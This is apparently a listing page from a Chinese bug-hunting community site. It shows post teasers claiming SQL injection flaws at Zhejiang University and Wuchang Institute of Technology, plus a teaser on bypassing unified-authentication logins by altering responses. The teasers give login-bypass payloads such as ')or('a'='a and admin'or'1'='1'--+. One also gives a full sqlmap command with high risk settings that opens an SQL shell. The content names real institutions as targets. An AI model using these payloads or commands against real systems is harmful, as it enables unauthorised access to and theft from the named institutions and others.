漏洞挖掘 第3页
各种漏洞挖掘过程、方法
浙江大学存在SQL注入-隼目安全

浙江大学存在SQL注入

万能密码进入后台,万能密码')or('a'='a 对登陆页面进行跑 sqlmappython sqlmap.py -r 1.txt --batch --random-agent --time-sec=2 --risk 3 --sql-shell 
纸豪的头像-隼目安全钻石会员纸豪1年前
02437
武昌理工学院存在 SQL 注入漏洞-隼目安全

武昌理工学院存在 SQL 注入漏洞

payload admin'or'1'='1'--+ 
纸豪的头像-隼目安全钻石会员纸豪1年前
011812
统一认证系统的挖掘方法-隼目安全

统一认证系统的挖掘方法

在挖掘一些业务的时候,很多系统都会放在一个统一认证中去访问,你只有登录统一认证才能去访问某个系统,那么当我们在挖掘的时候,遇见这样的环境怎么办呢?当然是最简单的修改返回包查看是否可...
Xuan8a1的头像-隼目安全钻石会员Xuan8a11年前
01447